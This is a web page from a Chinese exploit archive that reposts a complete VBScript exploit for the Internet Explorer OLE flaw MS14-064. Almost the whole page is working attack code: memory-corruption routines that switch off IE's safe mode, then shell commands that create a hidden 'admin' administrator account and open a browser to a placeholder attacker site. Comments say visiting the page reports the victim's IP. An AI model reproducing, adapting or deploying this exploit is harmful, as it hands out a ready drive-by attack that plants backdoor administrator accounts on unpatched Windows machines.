首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS14-064 Microsoft Windows OLE Package Manager Code Execution
来源:vfocus.net 作者:Anders 发布时间:2014-11-14  

<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />

<!--[if !IE]><!--> 本网站目前只支持IE,请使用IE打开本页面 <!--<![endif]--><br>
<!--[if IE]> 对不起,你没有权限打开本页面,请联系管理员 <![endif]-->


<!--#####漏洞利用的前提:使用IE、未打漏洞的、未开360的############################################-->
<!--#####用IE打开该页面后,电脑将会新建一个admin的用户,密码也是admin,并将IP发给自己的服务器######-->
<!--#####创建隐藏帐号请参考/art/20090420/4976.html###########################-->
<!--#####################          make by Anders          #######################################-->

 

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "net user admin admin /add",0
shell.run "net localgroup administrators admin /add",0
shell.run "iexplore"" http://www.黑客的网页.com",0
end function

</script>

<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))  
  else
     exit   function 
            
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                   
     else 
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)    
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2) 
 
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310 
     mydata=aa(a1)
     redim  Preserve aa(a0) 
end function


function setnotsafemode()
    On Error Resume Next
    i=mydata() 
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134) 
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0         
              redim  Preserve aa(a2)            
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0) 

     j=0
              j=readmemo(i+&h120+k)  
        
               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
 
    redim  Preserve aa(a0)
    redim   ab(a0)    
 
    redim  Preserve aa(a2)
 
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
         
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16            
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then   
                 If(IsObject(aa(a1)) = False ) Then            
                   type1=VarType(aa(a1))
                 end if              
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then   
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if              
            end if
        end if
    end if
             
   
    If(type1=&h2f66) Then        
          Over=True     
    End If 
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If 

    redim  Preserve aa(a0)         
       
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2) 
 
    ab(0)=0  
    aa(a1)=add+4    
    ab(0)=1.69759663316747E-313      
    ReadMemo=lenb(aa(a1)) 
  
    ab(0)=0   
 
    redim  Preserve aa(a0)
end function

</script>

</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS14-064 Microsoft Windows OLE
·ossec 2.8 Insecure Temporary F
·MS14-064 Microsoft Windows OLE
·Safari 8.0 / OS X 10.10 - Cras
·Internet Explorer OLE Automati
·ZTE ZXHN H108L - Authenticatio
·Internet Explorer OLE Automati
·ZTE ZXHN H108L - Authenticatio
·MS Office 2007 and 2010 - OLE
·PHP 5.x - Bypass Disable Funct
·IP.Board 3.4.7 SQL Injection
·Joomla HD FLV 2.1.0.1 Arbitrar
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved